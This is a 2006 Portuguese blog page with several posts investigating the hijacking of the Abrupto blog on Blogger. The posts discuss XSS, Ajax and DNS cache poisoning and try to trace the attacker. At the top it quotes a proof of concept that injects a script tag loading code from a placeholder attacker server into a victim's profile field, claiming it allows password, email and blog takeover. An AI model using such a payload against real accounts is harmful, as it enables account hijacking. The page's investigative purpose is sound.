Visão...
Revista Visão, 27.07.06, secção "Periscópio", página 56
A blogosfera está perigosa (IV)
----------------------------- Proof Of Concept; ---------------------------
Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to victim "First Name"
Now you can execute anything in remote. After login as your victim:
I. You can change password (without old password)
II. You can change e-mail address without any confirmation
III. You can own the victim blogs
---------------------------------------------------------------------------------------
Blogger XSS Vulnerability
No
Porém, arrastando-se a situação - pelos vistos, indefinidamente - e sabendo-se agora mais alguma coisa sobre a natureza do ataque, cumpre corrigir ligeiramente aquelas duas premissas, desde logo eliminando a primeira e acrescentando uma pequena variante à segunda: os dados do titular do blog não terão sido detectados remotamente, mas antes empastelados remotamente. Aliás, foi também esse o termo por nós anteriormente utilizado. A técnica/linguagem conhecida por XSS (Cross Site Scripting), complementada pelo já referido Ajax (basicamente, "HTTP requests", incluindo "cookie management"), tudo em conjunto permite não apenas este tipo de ataques - no caso vertente, com intuitos meramente publicitários - como outros muitíssimo mais perigosos e destruidores.
Em jeito de balanço, e utilizando um modelo vagamente policial, vejamos o que já temos sobre o assunto e, portanto, aquilo que falta.
Como
Ajax e XSS para penetração esporádica no painel de administração e sequestro da conta Blogger e do endereço Blogspot. Os conteúdos, incluindo cabeçalho e "template", são escritos através de ficheiros "javascript" (3 a 7 "document.write").
Quando
Onde
A julgar pela diferença horária e localizando o provável titular da conta AdBrite, nos Estados Unidos; o site com publicidade dessa mesma conta está num servidor em La Mesa, California.
Quem
O "hacker" teve, até agora, dois números de utilizador Blogger (31318965 e 31611969) mas a conta AdBrite é sempre a mesma (99246). Tratando-se de utilização abusiva e de apropriação indevida, qualquer uma das entidades (Blogger e AdBrite) está legalmente obrigada a fornecer a identificação do "prevaricador" (a qual, evidentemente, há-de ser falsa).
Porquê
Numa primeira fase, por uma questão de promoção publicitária: o Abrupto tem milhares de visitantes diários, é o maior blog português (nesse aspecto) e um dos mil mais vistos do mundo. Numa segunda fase, a reacção de Pacheco Pereira fez sobressair a vaidade típica deste género de "hacker" e, de certa forma, a sua infantilidade: agora, a coisa transformou-se numa espécie de jogo da "apanhada".
Estando por certo, neste preciso momento, muita gente a trabalhar no sentido de resolver o problema, não deverá ser muito difícil identificar - ao menos - a fonte do ataque: todos os dados estão disponíveis, como pistas, tanto neste como nos três posts anteriores sobre o mesmo tema. Visto que a Blogger.com não demonstra grande interesse em reconhecer e corrigir esta vulnerabilidade, igualmente não será extremamente penoso, podemos presumir, mudar o blog de endereço e, por conseguinte, para uma plataforma mais segura e tecnicamente mais evoluída. Porque não a Wordpress (ver nota) ou a Blogsome (ver nota), por exemplo? Ou, mais evidentemente ainda, porque não um domínio próprio?
A partir das pistas aqui deixadas, qualquer pessoa pode chegar à fonte do problema. No entanto, obviamente, mesmo a identificação do detentor do site de onde - ou em nome de cujo proprietário - os ataques são efectuados, não resultará absolutamente clara. Este género de indivíduos costuma ter muito cuidado com os documentos que assina.
Pela nossa parte, a dedicação de algum tempo a este assunto teve uma motivação exclusiva: identificar para prevenir casos futuros. Além disso, serviu pelas aprendizagens recolhidas. Mas, sinceramente, se me é permitida a opinião, já não há paciência para tanta conversa fiada e para tanta falta de resultados e de decisões, por mais simples ou por mais complexas que sejam. Mesmo relevando a arrogância e a indiferença manifestadas pelo autor daquele blog em particular, em relação a todas as pessoas que tentaram apenas ajudar em alguma coisa. E mesmo que tudo isto esteja completamente errado, a intenção não era com certeza insultar ou prejudicar fosse quem fosse. Que ao menos isso fique bem claro.
I rest my case.
Nota: ambos os endereços "ideais" estão ocupados: 1 e 2. Coincidências...
Imagem de Pravda.ru
A blogosfera está perigosa (III)
A Vida dos Meus Dias(IN)Certezas
Bola de Vento
McMenu
Memória Inventada (blogspot)
Harmonia do Barulho
Estes são seis exemplos de blogs portugueses cujos endereços foram, de uma forma ou de outra, "tomados" por outros que não os respectivos autores.
O "ataque" ao blog Abrupto, se bem que utilizando estratégia e técnica diferentes daqueles casos, não terá passado por conseguinte de mais uma espécie de brincadeira de mau gosto efectuada por um qualquer "hacker" mais virado para as vendas; num caso pontual e identificável, terá sido o utilizador Blogger com o "user ID" nº 31318965, do qual não existe, obviamente, o mínimo rasto.
A escolha do Abrupto como alvo particular do referido "ataque" ter-se-á certamente ficado a dever ao número de visitantes e de "page views" daquele blog, além das fragilidades e quebras de segurança da plataforma Blogger (assunto recorrente e relativamente antigo), tendo como finalidade única a promoção de uma conta Adbrite do mesmo "hacker".
Nota: na maior parte dos seis casos apontados, é muito possível que se tenha tratado de simples aproveitamento de endereço que entretanto foi desactivado pelo detentor original.
A blogosfera está perigosa (II)
Um pequeno trabalho ciber-detectivesco sobre o "empastelamento" do Abrupto.1. Todos os blogs com endereço blogspot.com partilham o mesmo endereço: 66.102.15.101, o que corresponde a blogspot.blogger.com (ou, na prática, a http://www.blogger.com/start).
2. Todos os blogs alojados naquele endereço são administrados por um servidor, evidentemente no mesmo endereço, cujo Netblock Owner é a Google Inc.
3. O único blog (por amostra, foram verificados apenas alguns) que tem mais do que um servidor é, precisamente, o Abrupto.
4. Este segundo servidor, cujo Netblock Owner está identificado como Savvis, está instalado no endereço 216.34.7.189.
5. Este último endereço corresponde não a Savvis.com (216.91.182.78) mas a um subdomínio de blogger.com: http://falstaff.blogger.com.
6. Aparentemente, falstaff.blogger.com não existe (http://216.34.7.189/) nem nunca existiu, apesar de estar referenciado como Netblock Owner do blog "Abrupto" desde 23 de Junho de 2003.
7. O Trace Route daquele endereço, passa de facto pela Savvis mas resulta em "Destination host unreachable", o que não é lá muito comum.
Falstaff não soa a "false stuff"? Certamente, uma coisa que não existe não parece ser grande homenagem à figura criada por Shakespeare.
Poderá ser este o endereço cujo DNS é trocado com o do "Abrupto" (e, quem sabe, com o de outros blogs) esporadicamente, apenas por algumas horas e por forma a nunca ser rastreado?
A blogosfera está perigosa
Hackers poison DNSDiverted to hell
By Nick Farrell
Monday 07 March 2005, 08:01
HACKERS HAVE found a way of diverting interweb punters from famous websites to dodgy URLs where they plied with spy and adware.
Security outfit, The Internet Storm Centre, posted a warning about "DNS cache poisoning" on its website on Friday.
It said that it had reports that this particular attack was redirecting traffic from google.com, ebay.com, and weather.com.
Basically the hackers are attacking a domain name server and poisoning the cache by planting counterfeit data in the cache of the name server.
(...)
The Inquirer (ler notícia completa)
Nos últimos dias, foram detectados comportamentos estranhos no acesso a alguns dos blogs portugueses mais conhecidos. Como se vê pela data do extracto da notícia acima (07.03.05), este "fenómeno" não é novo nem exclusivo daqueles endereços mais "mediáticos", por assim dizer; diversos blogs, nacionais e estrangeiros, sofreram o mesmo tipo de ataque e viram também os seus conteúdos ser substituídos por outros, de forma mais ou menos prolongada, mais ou menos destrutiva.
Existem diversas organizações que se dedicam à defesa da segurança na Internet, e em especial quanto àquilo que diz respeito aos chamados "hackers". Uma dessas organizações é a Honeynet, da qual existe um ramo português, e que se dedica à monotorização das actividades da pirataria informática ou cibernética, providenciando ao utilizador comum algumas ferramentas de detecção e de protecção.
O que sucedeu recentemente com o blog Abrupto, à semelhança dos outros casos, poderá ter sido, com maior probabilidade, uma de duas coisas: ou houve manipulação de DNS(*), como referido na notícia, ou os dados de identificação do(s) detentor(es) do(s) blog(s) foram detectados remotamente. Para eliminar uma delas, seria necessário estarmos em presença (sincronicamente) da versão pirateada do blog. Poderia também ajudar alguma coisa saber quais os períodos em que esteve on-line a página pirateada e se, nesses períodos, os acessos iriam todos dar a esta, ou se alguns acederiam à página/endereço original.
Pela experiência recente verificada no nosso domínio (cedilha.net), para não ir mais longe, e embora se trate de "acidentes" de características diferentes, dispondo daqueles dados poder-se-ia concluir muita coisa e mesmo, se calhar, isolar o problema (e, no limite, a sua fonte); o empastelamento de DNS poderá ter sido efectuado em apenas alguns servidores e, nesse caso, não tendo havido um registo abusivo de domínio, com a respectiva propagação (altamente improvável), seria possível detectar os canais de acesso seguro... bem como os outros, onde residiria o problema. Ou ainda montar um esquema de acesso alternativo e de recurso como, por exemplo, utilizando o Anonymouse, um "mirror site", redireccionamento alternativo, etc.
Hoje em dia, existem ferramentas terrivelmente eficazes fabricadas por e destinadas a piratas informáticos. Há programas específicos para detectar e gravar remotamente qualquer "password", número de cartão de crédito ou de conta bancária (keyboard recording). Não existe nenhum sistema pessoal absolutamente impenetrável ou 100% seguro (com o back orifice, por exemplo).
Todo o cuidado é pouco, portanto; aprender algumas regras de segurança básicas - aliás, como na vida real - e investir em ferramentas adequadas de defesa (pessoal) torna-se cada vez mais indispensável para a sobrevivência neste submundo em que se vai transformando a World Wide Web.
(*) Dynamic DNS Client, por exemplo, é uma forma legal de baralhar e tornar a dar endereços. Serve como ilustração daquilo que se poderá fazer por meios menos legais.
Para quem quiser saber, de forma simples e nada técnica, o que é e para que serve o DNS cache poisoning, deve ler este artigo de James Turnbull, no Ablog.
